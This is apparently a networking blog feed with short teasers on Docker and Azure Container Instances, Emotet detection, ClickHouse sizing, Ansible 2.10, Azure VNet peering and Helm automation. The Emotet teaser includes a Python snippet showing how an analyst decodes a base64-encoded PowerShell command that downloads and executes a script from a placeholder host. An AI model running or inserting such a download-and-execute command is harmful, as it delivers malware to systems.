Compose CLI ACI Integration Now Available

Today we are pleased to announce a major milestone: both the Compose CLI and the ACI integration have reached general availability (GA) with their V1 releases.

In May we announced the partnership between Docker and Microsoft to make it easier to deploy containerized applications from Docker Desktop to the cloud with Azure Container Instances (ACI). We are happy to let you know that all Docker Desktop users now have the ACI experience available to them by default, allowing them to easily use existing Docker commands to deploy and manage containers running in ACI.

As part of this, I also want to thank the Microsoft team who worked with us to make this all happen: Mike Morton, Karol Zadora-Przylecki, Brandon Waterloo, MacKenzie Olson, and Paul Yuknewicz.

Getting started with Docker and ACI 

To get started, all you need to do is upgrade your existing Docker Desktop to the latest stable version (2.5.0.0 or later), store your image on Docker Hub so you can deploy it (you can get started with Hub here), and then lastly you Continue reading
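Once Desktop is upgraded and an image is on Hub, the flow the post describes boils down to a short command sequence. This is an illustrative sketch only (the context and image names are placeholders), and it is not runnable without an Azure subscription:

```shell
docker login azure                      # authenticate Docker with your Azure account
docker context create aci myacicontext  # create an ACI context (prompts for subscription/resource group)
docker context use myacicontext         # point the CLI at ACI instead of the local engine
docker run -p 80:80 myorg/myapp         # runs the Hub-hosted image as an ACI container group
```

Switching back with `docker context use default` returns the CLI to the local Docker engine.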

Switching Back Into A Higher Gear

If you want to get a sense of what is happening at the high end of the Ethernet switch and routing market, Arista Networks, formerly an upstart and now one of the bigger vendors taking on the hegemony of Cisco Systems in datacenter networking, and now on the campus and at the edge, is probably the best bellwether there is.

Switching Back Into A Higher Gear was written by Timothy Prickett Morgan at The Next Platform.

Changes to Our Work in 2021

Here at the Internet Society, we believe that the Internet is for everyone. Our work focuses on ensuring that the Internet remains open, globally-connected, trustworthy, and secure.

In 2020, we saw the world change in ways that no one could have anticipated.  Because of this, like so many other organizations, we had to assess our current and future plans and evaluate the resources available to us. As a result, we have made some changes to our activities for the upcoming year.

Moving into 2021, we will reduce activities related to our Open Standards Everywhere (OSE) and Time Security projects.

We still deeply believe that open Internet standards and securing the Internet’s time synchronization infrastructure are critical components for building an open and trustworthy Internet. So, while OSE and Time Security will no longer be standalone projects next year, we will continue to promote and defend these concepts through our other projects, initiatives, and activities.

Our work in 2020 in both these areas has had a measurable impact and many successes, which we will document in the 2020 Impact Report that will be published in early 2021. We will continue to finish work in progress on Time Security and OSE Continue reading

Defeat Emotet Attacks with Behavior-Based Malware Protection

The security community has enjoyed a few months of silence from Emotet, an advanced and evasive malware threat, since February of this year. But the silence was broken in July as the VMware Threat Analysis Unit (TAU) observed a major new Emotet campaign and, since then, fresh attacks have continued to surface. What caught the attention of VMware TAU is that the security community still lacks the capacity to effectively detect and prevent Emotet, even though it first appeared in 2014. As an example of this, Figure 1 shows the detection status on VirusTotal for one of the weaponized documents from a recent Emotet attack. Only about 25% of antivirus engines blocked the file, even though the key techniques — such as a base64-encoded PowerShell script used to download the Emotet payload from one of five URLs — are nothing new. (These results were checked five days after they were first submitted to VirusTotal.)

Figure 1: Detection of an Emotet-related document on VirusTotal

In this blog post, we’ll investigate the first stage of the recent Emotet attacks by analyzing one of the samples from the recent campaign to reveal the tactics, techniques, and procedures (TTPs) used. This will help Continue reading
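The base64-encoded PowerShell downloader mentioned above is straightforward to unwrap once extracted from the weaponized document. Here is a minimal Python sketch of the decode step an analyst performs; note that `powershell -EncodedCommand` consumes UTF-16LE base64, and the command string and URL below are invented placeholders, not an actual Emotet sample:

```python
import base64

# Hypothetical downloader command, modeled on the technique described in the post.
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"

# What the macro embeds: base64 over the UTF-16LE bytes of the command.
encoded = base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

# What the analyst does: decode base64, then decode UTF-16LE to recover the URL(s).
decoded = base64.b64decode(encoded).decode("utf-16-le")
print(decoded)
```

The recovered plaintext is where the candidate payload URLs (five of them, in the campaign described) become visible for blocking and pivoting.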

ClickHouse Capacity Estimation Framework


We use ClickHouse widely at Cloudflare. It helps us with our internal analytics workload, bot management, customer dashboards, and many other systems. For instance, before Bot Management can analyze and classify our traffic, we need to collect logs. The Firewall Analytics tool needs to store and query data somewhere too. The same goes for our new Cloudflare Radar project. We are using ClickHouse for this purpose. It is a big database that can store huge amounts of data and return it on demand. This is not the first time we have talked about ClickHouse; there is a dedicated blog post on how we introduced ClickHouse for HTTP analytics.

Our biggest cluster has more than 100 nodes, and another has about half that number. Besides those, we have over 20 clusters with at least three nodes and a replication factor of three. Our current insertion rate is about 90M rows per second.

We use the standard approach in ClickHouse schema design. At the top level we have clusters, which hold shards; a shard is a group of nodes, and a node is a physical machine. You can find technical characteristics of the nodes here. Stored data is replicated between clusters. Different shards hold different parts Continue reading
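Numbers like these lend themselves to a back-of-the-envelope capacity estimate. Here is a hedged Python sketch: the 90M rows/s insertion rate is from the post, while the row size, retention window, and compression ratio are purely illustrative assumptions:

```python
def estimated_storage_tb(rows_per_sec: float, bytes_per_row: float,
                         replication: int, retention_days: int,
                         compression_ratio: float) -> float:
    """Rough storage estimate: raw ingest volume over the retention window,
    multiplied by the replication factor, divided by on-disk compression."""
    raw_bytes = rows_per_sec * 86400 * retention_days * bytes_per_row
    return raw_bytes * replication / compression_ratio / 1e12

# 90M rows/s from the post; 100 B/row, 30-day retention, 3x replication,
# and 10:1 compression are illustrative guesses, not Cloudflare's figures.
print(round(estimated_storage_tb(90e6, 100, 3, 30, 10), 1))
```

Even with generous compression, estimates at this scale land in the petabyte range, which is why a dedicated capacity estimation framework is worth building.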

Ansible 2.10 introduction

Hello my friend,

as you know, Ansible is one of the leading tools for IT and network infrastructure automation. We have written a lot about it before (e.g. CLI configs, OpenConfig with NETCONF, or VNF-M). Recently Red Hat announced a new version of Ansible (Ansible 2.10), which significantly changes the way we work with it.


No part of this blogpost could be reproduced, stored in a
retrieval system, or transmitted in any form or by any
means, electronic, mechanical or photocopying, recording,
or otherwise, for commercial purposes without the
prior permission of the author.

Eager to learn about network automation?

We are here to help you. At our network automation training you learn all you need to know to be successful with such tasks in your profession:

  • Linux, Docker, KVM
  • YANG models
  • JSON, XML, Protocol Buffers (Protobuf) data formats
  • SSH, REST API, gRPC transport
  • gNMI, NETCONF, RESTCONF protocols
  • How to use and manage everything above with Ansible, Bash, and Python

Start your automation training today.

What this is about

Ansible 2.10 is more than just another Ansible update. It is a new approach, a paradigm shift, Continue reading
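For context, the headline change in Ansible 2.10 is the split of the monolithic package into a slim ansible-base plus separately installed content collections, with modules addressed by fully qualified collection names (FQCNs). A hypothetical before/after task, assuming the cisco.ios collection is installed (`ansible-galaxy collection install cisco.ios`):

```yaml
# Ansible 2.9 style: bare module name resolved from the monolithic package.
- name: Push interface description (2.9)
  ios_config:
    lines:
      - description uplink to core
    parents: interface GigabitEthernet0/0

# Ansible 2.10 style: the same module, addressed by its FQCN.
- name: Push interface description (2.10)
  cisco.ios.ios_config:
    lines:
      - description uplink to core
    parents: interface GigabitEthernet0/0
```

The interface name and description here are illustrative; the point is purely the FQCN addressing.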

Renumbering Public Cloud Address Space

Got this question from one of the networking engineers “blessed” with rampant clueless-rush-to-the-cloud.

I plan to peer multiple VNet from different regions. The problem is that there is not any consistent deployment in regards to the private IP subnets used on each VNet to the point I found several of them using public IP blocks as private IP ranges. As far as I recall, in Azure we can’t re-ip the VNets as the resource will be deleted so I don’t see any other option than use NAT from offending VNet subnets to use my internal RFC1918 IPv4 range. Do you have a better idea?

The way I understand Azure, while you COULD have any address range configured as VNet CIDR block, you MUST have non-overlapping address ranges for VNet peering.
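The overlap requirement is easy to check programmatically before attempting peering. A small Python sketch using the standard ipaddress module (the CIDRs are examples; a "public" block used privately still conflicts if the ranges overlap):

```python
import ipaddress

def vnets_can_peer(cidr_a: str, cidr_b: str) -> bool:
    """VNet peering requires non-overlapping address spaces."""
    a = ipaddress.ip_network(cidr_a)
    b = ipaddress.ip_network(cidr_b)
    return not a.overlaps(b)

print(vnets_can_peer("10.0.0.0/16", "10.0.128.0/17"))   # False: ranges overlap
print(vnets_can_peer("10.0.0.0/16", "172.16.0.0/16"))   # True: peerable
```

Running this across every VNet pair before peering would flag exactly the offending subnets the reader describes.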


Day Two Cloud 073: AnsibleFest & HashiConf 2020 Announcements, Analysis & Awesomeness

Ned Bellavance and Ethan Banks analyze the big announcements from two conferences the clouderati should care about: AnsibleFest and HashiConf Digital. Both of these were virtual events because there's still a pandemic on, folks. Speaking of which, how do Ned and Ethan feel about virtual events? Not great, really. Slidewhipping the attendees in multi-day webinars seems to be how vendors are running their virtual conferences, and it ain't workin'...


The post Day Two Cloud 073: AnsibleFest & HashiConf 2020 Announcements, Analysis & Awesomeness appeared first on Packet Pushers.

Sometimes HPC Means Big Memory, Not Big Compute

Not every HPC or analytics workload – meaning an algorithmic solver and the data that it chews on – fits nicely in a 128 GB or 256 GB or even a 512 GB memory space, and sometimes the dataset is quite large and runs best in a larger memory space rather than being carved up into smaller pieces and distributed across nodes with the same amount of raw compute.

Sometimes HPC Means Big Memory, Not Big Compute was written by Timothy Prickett Morgan at The Next Platform.

Message from Internet Society Audit Committee Chair

As Chair of the Internet Society Audit Committee, I wanted to share an update with you.

As you may know, the Audit Committee reviews the Conflict of Interest forms filed by members of the Board of Trustees and officers of the Internet Society to ensure that we are in compliance with our Conflict of Interest (“CoI”) policy.

The CoI policy states that members of the Board of Trustees cannot hold a position in the policy development process in another organization operating in the Internet Society's areas of engagement, and we are evaluating a situation where this restriction may be relevant. One of our Trustees has been appointed as a non-voting member of the GNSO Council, the council of the Generic Names Supporting Organization, a policy-development body that develops and recommends policies relating to generic top-level domains (gTLDs) to the ICANN Board.

The Internet Society has a long history of collaborating with our diverse community from around the world, and is committed to having vibrant and robust global engagement. We work across countries and cultures and seek diverse cross-organizational expertise. This makes us stronger—sound practices and clear policies are a critical part of that.

We recognize that the expertise of our trustees is Continue reading

Automating Helm using Ansible

Increasing business demands are driving the need for increased automation to support rapid yet stable and reliable deployments of applications and supporting infrastructure. Kubernetes and cloud-native technologies are no different. For the Kubernetes platform, Helm is the standard means of packaging, configuring, and deploying applications and services onto any cluster.

We recently released kubernetes.core 1.1, our first Red Hat Certified Content Collection release, for general use. A big part of the new content introduced is support for automating Helm operations. In this blog post, I will show you some common scenarios for its use in your automation.

Please note that prior to the release of kubernetes.core 1.1, its contents were released as community.kubernetes. With this content becoming Red Hat supported and certified content, a name change was in order. We are in the process of making that transition.

 

A Quick Introduction to Helm

Helm is an open source tool used for packaging and deploying applications on Kubernetes. It is often called the Kubernetes package manager. It is widely adopted by the Kubernetes community and is a Cloud Native Computing Foundation (CNCF) graduated project.

Helm simplifies deployment of applications by abstracting Continue reading
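As a taste of what the collection enables, here is a hypothetical playbook fragment using the kubernetes.core Helm modules; the repository, chart, release, and namespace names are illustrative, and it assumes a reachable cluster with valid kubeconfig credentials:

```yaml
- name: Deploy nginx via Helm
  hosts: localhost
  tasks:
    - name: Add the bitnami chart repository
      kubernetes.core.helm_repository:
        name: bitnami
        repo_url: https://charts.bitnami.com/bitnami

    - name: Install the chart as release "web"
      kubernetes.core.helm:
        name: web
        chart_ref: bitnami/nginx
        release_namespace: demo
        create_namespace: true
        values:
          replicaCount: 2
```

Because the module is idempotent, re-running the play with changed `values` performs a `helm upgrade` rather than a fresh install.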

Do We Need LFA or FRR for Fast Failover in ECMP Designs?

One of my readers sent me a question along these lines:

Imagine you have a router with four equal-cost paths to prefix X, two toward upstream-1 and two toward upstream-2. Now let’s suppose that one of those links goes down and you want to have link protection. Do I really need Loop-Free Alternate (LFA) or MPLS Fast Reroute (FRR) to get fast (= immediate) failover or could I rely on multiple equal-cost paths to get the job done? I’m getting different answers from different vendors…

Please note that we’re talking about a very specific question of whether in scenarios with equal-cost layer-3 paths the hardware forwarding data structures get adjusted automatically on link failure (without CPU reprogramming them), and whether LFA needs to be configured to make the adjustment happen.
